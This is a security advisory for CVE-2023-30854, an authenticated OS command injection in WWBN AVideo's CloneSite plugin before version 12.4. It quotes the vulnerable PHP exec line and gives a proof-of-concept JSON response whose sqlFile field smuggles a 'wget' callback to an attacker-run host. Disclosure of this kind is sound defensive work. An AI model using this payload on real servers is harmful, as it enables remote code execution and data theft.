GHSA-6vrj-ph27-qfp3

Опубликовано: 27 апр. 2023

Источник: github

Github: Прошло ревью

CVSS3: 8.8

Описание

Remote code injection in wwbn/avideo

WWBN Avideo Authenticated RCE - OS Command Injection

Description

An OS Command Injection vulnerability in an Authenticated endpoint /plugin/CloneSite/cloneClient.json.php allows attackers to achieve Remote Code Execution.

Vulnerable code:

$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}"; $log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file"); exec($cmd . " 2>&1", $output, $return_val);

We can control $objClone->cloneSiteURL through the admin panel clone site feature.

/plugin/CloneSite/cloneClient.json.php sends a GET Request to {$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php. I hosted a specially crafted cloneServer.json.php that prints the following JSON data

{"error":false,"msg":"","url":"https:\/\/REDACTED/\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/[demo.avideo.com](http://demo.avideo.com/)\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget [http://REDACTED:4444/`pwd`](http://redacted:4444/pwd) ;#","videoFiles":[],"photoFiles":[]}

Send a GET Request to /plugin/CloneSite/cloneClient.json.php then remote code execution is achieved.

rce

Ссылки

Пакеты

Наименование

wwbn/avideo

composer

Затронутые версииВерсия исправления

< 12.4

12.4

EPSS

Процентиль: 98%

0.64015

Средний

8.8 High

CVSS3

CVE ID

CVE-2023-30854

Дефекты

CWE-78

Связанные уязвимости

CVE-2023-30854

CVSS3: 8.8

nvd

почти 3 года назад

AVideo is an open source video platform. Prior to version 12.4, an OS Command Injection vulnerability in an authenticated endpoint `/plugin/CloneSite/cloneClient.json.php` allows attackers to achieve Remote Code Execution. This issue is fixed in version 12.4.

EPSS

Процентиль: 98%

0.64015

Средний

8.8 High

CVSS3

CVE ID

CVE-2023-30854

Дефекты

CWE-78